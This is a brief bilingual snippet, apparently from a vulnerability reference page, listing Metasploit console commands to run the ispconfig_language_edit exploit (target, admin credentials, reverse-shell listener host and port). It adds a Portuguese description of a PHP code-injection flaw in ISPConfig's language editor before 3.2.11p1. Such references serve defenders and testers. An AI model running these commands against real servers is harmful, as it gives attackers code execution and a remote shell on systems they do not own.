
Metasploit Modules
Módulo Metasploit

use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
Foi descoberto um problema no ISPConfig anterior à versão 3.2.11p1. A injeção de código PHP pode ser realizada no editor de arquivos de idioma por um administrador se admin_allow_langedit estiver ativado.